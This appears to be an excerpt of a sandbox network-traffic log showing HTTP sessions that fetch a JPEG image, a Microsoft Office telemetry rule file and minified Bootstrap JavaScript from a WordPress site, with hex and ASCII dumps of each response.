                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5f748d02fd4-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC888INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 07 07 07 07 07 07 08 08 08 08 0b 0b 0a 0b 0b 10 0e 0d 0d 0e 10 18 11 12 11 12 11 18 24 16 1a 16 16 1a 16 24 20 26 1f 1d 1f 26 20 39 2d 27 27 2d 39 42 37 34 37 42 4f 47 47 4f 64 5f 64 83 83 b0 01 07 07 07 07 07 07 08 08 08 08 0b 0b 0a 0b 0b 10 0e 0d 0d 0e 10 18 11 12 11 12 11 18 24 16 1a 16 16 1a 16 24 20 26 1f 1d 1f 26 20 39 2d 27 27 2d 39 42 37 34 37 42 4f 47 47 4f 64 5f 64 83 83 b0 ff c2 00 11 08 01 b8 05 a0 03 01 22 00 02 11 01 03 11 01 ff c4 00 1b 00 01 00 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 02 03 04 01 06 05 08 ff da 00 08 01 01 00 00 00 00 fd 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii: JFIF$$ && 9-''-9B747BOGGOd_d$$ && 9-''-9B747BOGGOd_d""
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC1369INData Raw: 00 00 00 00 76 fb fa 47 35 15 00 00 00 00 00 00 00 23 9e 00 00 00 00 29 cf 44 00 f5 80 00 00 00 00 00 00 00 00 11 ad c0 00 00 00 00 00 00 02 8a 40 00 00 01 ca 73 d1 10 07 ac 00 00 00 00 00 00 00 00 05 39 e8 e2 56 5d 30 00 00 00 00 00 00 2a a3 80 00 00 03 94 67 a3 80 01 eb 00 00 00 00 00 00 00 00 08 66 a2 00 27 6d b2 00 00 00 00 00 00 47 3c 00 00 00 0e 51 9e 8e 00 00 f5 80 00 00 00 00 00 00 00 14 66 a4 00 16 5d 68 00 00 00 00 00 14 d0 00 00 00 55 96 88 80 00 1e b0 00 00 00 00 00 00 00 11 cb 44 00 00 12 b6 e9 00 00 00 00 00 21 9e 20 00 00 11 cf 96 b0 00 00 7a c0 00 00 00 00 00 00 01 4e 6a a2 00 00 05 97 5a 00 00 00 00 06 7a 80 00 00 2b c9 9f 80 00 00 3d 60 00 00 00 00 00 00 03 3e 5a c0 00 00 04 ee b8 00 00 00 00 aa 8e 00 00 00 cf 96 90 00 00 03 d6 00 00 00
                                                                                                                                                                                                                              Data Ascii: vG5#)D@s9V]0*gf'mG<Qf]hUD! zNjZz+=`>Z
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC1369INData Raw: 5d 00 00 00 f2 80 00 be a0 00 00 00 03 6f 40 de 96 00 00 00 79 40 01 5d 28 00 00 00 00 55 80 be 9a 00 00 00 3c a0 01 7d 40 00 00 00 02 e8 0d e9 a5 00 00 00 1e 50 03 7a d0 00 00 00 00 db d0 2e c1 40 00 00 0f 28 02 ba e8 00 00 00 00 db d0 6f 4d 01 40 00 00 1e 50 0d ec 00 00 00 00 0b a0 67 60 03 40 00 00 7f ff c4 00 1a 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 06 04 05 ff da 00 08 01 03 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 9a 00 00 00 00 00 00 00 00 00 00 02 b4 a3 d0 00 00 00 00 00 00 00 00 00 00 45 73 81 e8 00 00 00 00 00 00 00 00 00 00 8a 66 07 a0 00 00 00 00 00 00 00 00 00 08 ce 80 1e 80 00 00 00 00 00 00 00 ac 2b 11 04 48 4a b4 99 99 03 d0 00 00 00 00 00 00 0a d6 b5 ad 62 00 01 14 a0 4a 6d
                                                                                                                                                                                                                              Data Ascii: ]o@y@](U<}@Pz.@(oM@Pg`@"Esf+HJbJm
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC1369INData Raw: e8 f5 a8 eb 93 18 b6 9a 89 e4 67 ee 95 f0 20 88 19 5b 23 e1 97 c2 e1 73 20 43 5e 98 ef 86 d8 7e 91 1a d3 55 bb c0 85 d9 b3 63 e1 cd 51 57 2c 4c 67 66 cc fa 54 54 71 93 18 96 a6 41 75 c3 fe c5 ad 4f cf 78 08 3e 08 58 01 89 8d 5a 98 ef 86 d2 3b 94 c6 b4 b9 ca e1 0d 47 6c d8 f8 8b 3a ac 67 66 f4 d0 25 72 24 44 b4 54 4e f0 44 5b 58 ef 11 5d 4e 47 b6 b3 aa 8c c0 86 d1 4c 65 8c 36 93 92 ac 35 aa 1f ab 6c 21 24 e7 e2 6c ea b9 98 f5 19 b2 c0 7a 80 54 71 93 18 b6 82 01 04 6d 16 b2 37 7f 63 bb f5 24 08 d5 e9 af bf fc 8d 69 3f 48 de 35 5a 8d df b6 1e 2c 48 51 89 8d 54 9c 17 d4 aa ee bf 29 22 2d a9 d7 3b 8f bc 5a f4 db e6 c3 b0 17 0b 99 02 1b 4a 8c 81 31 ad 15 1b 2c 21 66 6c c9 3e 30 f5 40 c1 61 25 8d e4 93 e0 6c e8 9f 33 01 1a d2 83 e5 bc c6 b4 b9 f9 6e 11 9d df e6
                                                                                                                                                                                                                              Data Ascii: g [#s C^~UcQW,LgfTTqAuOx>XZ;Gl:gf%r$DTND[X]NGLe65l!$lzTqm7c$i?H5Z,HQT)"-;ZJ1,!fl>0@a%l3n
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC1369INData Raw: fa 25 ea 77 2e ff 00 e6 ae c9 94 4a 8a de c7 e1 d4 b4 22 60 bf ec 7f 11 dd dc de c7 d2 8f 51 10 62 71 f2 8f 55 df d8 79 7a 24 90 05 e6 3b 96 c0 65 f0 92 a3 2e 78 88 ae ad 91 ff 00 37 a8 88 2f 63 8f 94 a9 5d de f1 92 f9 7a 50 90 a2 f2 40 12 a5 a6 fc 13 78 49 27 d1 2c e1 04 67 2c 6f 3f 10 12 22 55 c8 36 f0 10 45 e3 f5 24 01 79 20 09 52 d3 98 4d e1 24 92 49 bc fa 52 a5 64 4c 33 3e 51 dd dc de c7 fa f4 53 b8 5c 06 26 12 49 bc fc 75 76 5c 8c 4a 8a d9 e0 65 4a e8 98 66 de 51 ea 3d 43 7b 1f eb d2 8c c1 45 e4 80 25 4b 41 6c 13 01 e7 df e8 b7 a9 98 5d fb 0b 32 a0 bd 88 02 54 b4 33 60 98 0f cc 5a 8c be e2 2b 06 18 7a 4e a5 65 4c 33 6f 28 ee ce 6f 63 e8 a2 40 04 98 ee 5b 01 80 ec 35 2b aa 60 31 68 ce ce 6f 63 fa 82 44 4a bd cd bf a4 09 0a 2f 24 01 2a 5a 09 c1 30 1e
                                                                                                                                                                                                                              Data Ascii: %w.J"`QbqUyz$;e.x7/c]zP@xI',g,o?"U6E$y RM$IRdL3>QS\&Iuv\JeJfQ=C{E%KAl]2T3`Z+zNeL3o(oc@[5+`1hocDJ/$*Z0
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC1053INData Raw: 49 a5 98 78 98 4d f8 1e 21 46 68 61 42 14 26 90 f5 31 d7 c2 c2 a7 ef 81 9a 4e 26 8a cd 04 d0 f3 1a 33 09 eb 72 2a b3 43 34 1e d8 50 20 07 89 85 85 67 6d ec 16 14 58 50 f6 c2 81 30 1e 3f 78 56 60 37 a2 96 61 43 db 0a 87 af 2c aa c0 0f 04 17 b1 0a 2e ce 51 61 40 ef 00 3b 79 80 b0 03 c0 2a b0 a7 2c 2a 1e b6 62 ab 0a 10 03 cd c2 c2 a1 d7 28 b0 a1 00 3b 1b 30 2f a8 53 96 00 7a f3 ca cc 07 54 a2 f6 21 43 db 00 3b 1b 39 55 85 02 06 3c f0 58 01 d4 c2 c2 ab de 15 0d 9c 85 57 bc 2a 1b 09 5e a0 2f 62 14 3d c0 0d 9c 16 14 7d c0 0f 5b 08 2c 00 e9 95 58 54 3b ed 00 b0 a7 30 03 62 2b d3 2a b0 a0 6d 1f 2b 0a 73 00 0d 88 16 00 74 81 61 40 da 4a 2f 78 00 6c 61 30 1d 10 56 14 0e fb 49 45 85 43 64 2b d1 05 85 39 9f 01 b4 02 b0 a0 6c 80 b0 03 a2 51 60 06 d2 51 7e 59 f0 1b 20
                                                                                                                                                                                                                              Data Ascii: IxM!FhaB&1N&3r*C4P gmXP0?xV`7aC,.Qa@;y*,*b(;0/SzT!C;9U<XW*^/b=}[,XT;0b+*m+sta@J/xla0VIECd+9lQ`Q~Y


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              141192.168.2.64987813.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:13 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 416
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                                                                              x-ms-request-id: e131a4b8-201e-005d-245d-23afb3000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180413Z-r1755647c668mbb8rg8s8fbge400000005gg000000002r29
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              142192.168.2.649882141.193.213.114431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:13 UTC637OUTGET /wp-content/themes/socialdriver/js/functions-spb.min.js HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:13 GMT
                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Thu, 26 Sep 2024 14:03:37 GMT
                                                                                                                                                                                                                              ETag: W/"66f569b9-13105a"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614824
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5fb2ab46c13-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC875INData Raw: 37 64 63 32 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 65 28 65 78 70 6f 72 74 73 2c 72 65 71 75 69 72 65 28 22 6a 71 75 65 72 79 22 29 2c 72 65 71 75 69 72 65 28 22 70 6f 70 70 65 72 2e 6a 73 22 29 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 65 78 70 6f 72 74 73 22 2c 22 6a 71 75 65 72 79 22 2c 22 70 6f 70 70 65 72 2e 6a 73 22 5d 2c 65 29 3a 65 28 28 74 3d 74 7c 7c 73 65 6c 66 29 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69
                                                                                                                                                                                                                              Data Ascii: 7dc2!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e((t=t||self).bootstrap={},t.jQuery,t.Popper)}(thi
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC1369INData Raw: 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 69 7d 29 7d 72 65 74 75 72 6e 20 6e 7d 63 3d 63 26 26 63 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 64 65 66 61 75 6c 74 22 29 3f 63 2e 64 65 66 61 75 6c 74 3a 63 2c 73 3d 73 26 26 73 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 64 65 66 61 75 6c 74 22 29 3f 73 2e 64 65 66 61 75 6c 74 3a 73 3b 76 61 72 20 7a 3d 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 3b 76 61 72 20 64 3d 7b 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 3a 22 62 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 22 2c 67 65 74 55 49 44 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 3b 74 2b 3d 7e 7e 28 31 65 36 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 2c 64 6f 63 75 6d 65 6e 74
                                                                                                                                                                                                                              Data Ascii: nfigurable:!0,writable:!0}):e[t]=i})}return n}c=c&&c.hasOwnProperty("default")?c.default:c,s=s&&s.hasOwnProperty("default")?s.default:s;var z="transitionend";var d={TRANSITION_END:"bsTransitionEnd",getUID:function(t){for(;t+=~~(1e6*Math.random()),document
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC1369INData Raw: 6f 66 20 53 68 61 64 6f 77 52 6f 6f 74 3f 74 3a 74 2e 70 61 72 65 6e 74 4e 6f 64 65 3f 64 2e 66 69 6e 64 53 68 61 64 6f 77 52 6f 6f 74 28 74 2e 70 61 72 65 6e 74 4e 6f 64 65 29 3a 6e 75 6c 6c 3a 28 74 3d 74 2e 67 65 74 52 6f 6f 74 4e 6f 64 65 28 29 29 69 6e 73 74 61 6e 63 65 6f 66 20 53 68 61 64 6f 77 52 6f 6f 74 3f 74 3a 6e 75 6c 6c 3a 6e 75 6c 6c 7d 7d 2c 51 3d 28 63 2e 66 6e 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 69 3d 21 31 3b 72 65 74 75 72 6e 20 63 28 74 68 69 73 29 2e 6f 6e 65 28 64 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 69 3d 21 30 7d 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 7c
                                                                                                                                                                                                                              Data Ascii: of ShadowRoot?t:t.parentNode?d.findShadowRoot(t.parentNode):null:(t=t.getRootNode())instanceof ShadowRoot?t:null:null}},Q=(c.fn.emulateTransitionEnd=function(t){var e=this,i=!1;return c(this).one(d.TRANSITION_END,function(){i=!0}),setTimeout(function(){i|
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC1369INData Raw: 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 63 28 74 68 69 73 29 2c 65 3d 74 2e 64 61 74 61 28 57 29 3b 65 7c 7c 28 65 3d 6e 65 77 20 61 28 74 68 69 73 29 2c 74 2e 64 61 74 61 28 57 2c 65 29 29 2c 22 63 6c 6f 73 65 22 3d 3d 3d 69 26 26 65 5b 69 5d 28 74 68 69 73 29 7d 29 7d 2c 61 2e 5f 68 61 6e 64 6c 65 44 69 73 6d 69 73 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 26 26 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 65 2e 63 6c 6f 73 65 28 74 68 69 73 29 7d 7d 2c 65 28 61 2c 6e 75 6c 6c 2c 5b 7b 6b 65 79 3a 22 56 45 52 53 49 4f 4e 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 34 2e 33 2e 31 22 7d 7d 5d 29
                                                                                                                                                                                                                              Data Ascii: return this.each(function(){var t=c(this),e=t.data(W);e||(e=new a(this),t.data(W,e)),"close"===i&&e[i](this)})},a._handleDismiss=function(e){return function(t){t&&t.preventDefault(),e.close(this)}},e(a,null,[{key:"VERSION",get:function(){return"4.3.1"}}])
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC1369INData Raw: 65 6e 74 2c 42 29 2c 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3d 6e 75 6c 6c 7d 2c 71 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 63 28 74 68 69 73 29 2e 64 61 74 61 28 42 29 3b 74 7c 7c 28 74 3d 6e 65 77 20 71 28 74 68 69 73 29 2c 63 28 74 68 69 73 29 2e 64 61 74 61 28 42 2c 74 29 29 2c 22 74 6f 67 67 6c 65 22 3d 3d 3d 65 26 26 74 5b 65 5d 28 29 7d 29 7d 2c 65 28 71 2c 6e 75 6c 6c 2c 5b 7b 6b 65 79 3a 22 56 45 52 53 49 4f 4e 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 34 2e 33 2e 31 22 7d 7d 5d 29 2c 71 29 3b 66 75 6e 63 74 69 6f 6e 20 71 28 74 29 7b 74 68 69 73 2e 5f 65 6c 65 6d 65
                                                                                                                                                                                                                              Data Ascii: ent,B),this._element=null},q._jQueryInterface=function(e){return this.each(function(){var t=c(this).data(B);t||(t=new q(this),c(this).data(B,t)),"toggle"===e&&t[e]()})},e(q,null,[{key:"VERSION",get:function(){return"4.3.1"}}]),q);function q(t){this._eleme
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC1369INData Raw: 6e 67 7c 7c 74 68 69 73 2e 5f 73 6c 69 64 65 28 4a 29 7d 2c 69 2e 6e 65 78 74 57 68 65 6e 56 69 73 69 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 21 64 6f 63 75 6d 65 6e 74 2e 68 69 64 64 65 6e 26 26 63 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 69 73 28 22 3a 76 69 73 69 62 6c 65 22 29 26 26 22 68 69 64 64 65 6e 22 21 3d 3d 63 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 63 73 73 28 22 76 69 73 69 62 69 6c 69 74 79 22 29 26 26 74 68 69 73 2e 6e 65 78 74 28 29 7d 2c 69 2e 70 72 65 76 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 7c 7c 74 68 69 73 2e 5f 73 6c 69 64 65 28 74 74 29 7d 2c 69 2e 70 61 75 73 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 7c 7c 28 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 3d 21 30 29 2c
                                                                                                                                                                                                                              Data Ascii: ng||this._slide(J)},i.nextWhenVisible=function(){!document.hidden&&c(this._element).is(":visible")&&"hidden"!==c(this._element).css("visibility")&&this.next()},i.prev=function(){this._isSliding||this._slide(tt)},i.pause=function(t){t||(this._isPaused=!0),
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC1369INData Raw: 74 6f 75 63 68 44 65 6c 74 61 58 29 3b 74 3c 3d 34 30 7c 7c 28 30 3c 28 74 3d 74 2f 74 68 69 73 2e 74 6f 75 63 68 44 65 6c 74 61 58 29 26 26 74 68 69 73 2e 70 72 65 76 28 29 2c 74 3c 30 26 26 74 68 69 73 2e 6e 65 78 74 28 29 29 7d 2c 69 2e 5f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 6b 65 79 62 6f 61 72 64 26 26 63 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 70 2e 4b 45 59 44 4f 57 4e 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 5f 6b 65 79 64 6f 77 6e 28 74 29 7d 29 2c 22 68 6f 76 65 72 22 3d 3d 3d 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 70 61 75 73 65 26 26 63 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29
                                                                                                                                                                                                                              Data Ascii: touchDeltaX);t<=40||(0<(t=t/this.touchDeltaX)&&this.prev(),t<0&&this.next())},i._addEventListeners=function(){var e=this;this._config.keyboard&&c(this._element).on(p.KEYDOWN,function(t){return e._keydown(t)}),"hover"===this._config.pause&&c(this._element)
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC1369INData Raw: 68 3f 69 2e 74 6f 75 63 68 44 65 6c 74 61 58 3d 30 3a 69 2e 74 6f 75 63 68 44 65 6c 74 61 58 3d 74 2e 6f 72 69 67 69 6e 61 6c 45 76 65 6e 74 2e 74 6f 75 63 68 65 73 5b 30 5d 2e 63 6c 69 65 6e 74 58 2d 69 2e 74 6f 75 63 68 53 74 61 72 74 58 7d 29 2c 63 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 70 2e 54 4f 55 43 48 45 4e 44 2c 65 29 29 29 7d 2c 69 2e 5f 6b 65 79 64 6f 77 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 21 2f 69 6e 70 75 74 7c 74 65 78 74 61 72 65 61 2f 69 2e 74 65 73 74 28 74 2e 74 61 72 67 65 74 2e 74 61 67 4e 61 6d 65 29 29 73 77 69 74 63 68 28 74 2e 77 68 69 63 68 29 7b 63 61 73 65 20 33 37 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 70 72 65 76 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 33
                                                                                                                                                                                                                              Data Ascii: h?i.touchDeltaX=0:i.touchDeltaX=t.originalEvent.touches[0].clientX-i.touchStartX}),c(this._element).on(p.TOUCHEND,e)))},i._keydown=function(t){if(!/input|textarea/i.test(t.target.tagName))switch(t.which){case 37:t.preventDefault(),this.prev();break;case 3
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC1369INData Raw: 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6e 65 78 74 22 2c 22 6c 65 66 74 22 29 3a 28 69 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 72 69 67 68 74 22 2c 6e 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 70 72 65 76 22 2c 22 72 69 67 68 74 22 29 3b 6c 26 26 63 28 6c 29 2e 68 61 73 43 6c 61 73 73 28 66 29 3f 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 3d 21 31 3a 21 74 68 69 73 2e 5f 74 72 69 67 67 65 72 53 6c 69 64 65 45 76 65 6e 74 28 6c 2c 74 29 2e 69 73 44 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 28 29 26 26 61 26 26 6c 26 26 28 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 3d 21 30 2c 68 26 26 74 68 69 73 2e 70 61 75 73 65 28 29 2c 74 68 69 73 2e 5f 73 65 74 41 63 74 69 76 65 49 6e 64 69 63 61 74 6f 72 45 6c 65 6d 65 6e 74 28 6c 29 2c 73 3d 63
                                                                                                                                                                                                                              Data Ascii: arousel-item-next","left"):(i="carousel-item-right",n="carousel-item-prev","right");l&&c(l).hasClass(f)?this._isSliding=!1:!this._triggerSlideEvent(l,t).isDefaultPrevented()&&a&&l&&(this._isSliding=!0,h&&this.pause(),this._setActiveIndicatorElement(l),s=c
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC1369INData Raw: 41 70 69 43 6c 69 63 6b 48 61 6e 64 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 69 2c 6e 3d 64 2e 67 65 74 53 65 6c 65 63 74 6f 72 46 72 6f 6d 45 6c 65 6d 65 6e 74 28 74 68 69 73 29 3b 6e 26 26 28 6e 3d 63 28 6e 29 5b 30 5d 29 26 26 63 28 6e 29 2e 68 61 73 43 6c 61 73 73 28 22 63 61 72 6f 75 73 65 6c 22 29 26 26 28 65 3d 6f 28 7b 7d 2c 63 28 6e 29 2e 64 61 74 61 28 29 2c 63 28 74 68 69 73 29 2e 64 61 74 61 28 29 29 2c 28 69 3d 74 68 69 73 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 73 6c 69 64 65 2d 74 6f 22 29 29 26 26 28 65 2e 69 6e 74 65 72 76 61 6c 3d 21 31 29 2c 6d 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 63 28 6e 29 2c 65 29 2c 69 26 26 63 28 6e 29 2e 64 61 74 61 28 56 29 2e 74 6f 28
                                                                                                                                                                                                                              Data Ascii: ApiClickHandler=function(t){var e,i,n=d.getSelectorFromElement(this);n&&(n=c(n)[0])&&c(n).hasClass("carousel")&&(e=o({},c(n).data(),c(this).data()),(i=this.getAttribute("data-slide-to"))&&(e.interval=!1),m._jQueryInterface.call(c(n),e),i&&c(n).data(V).to(


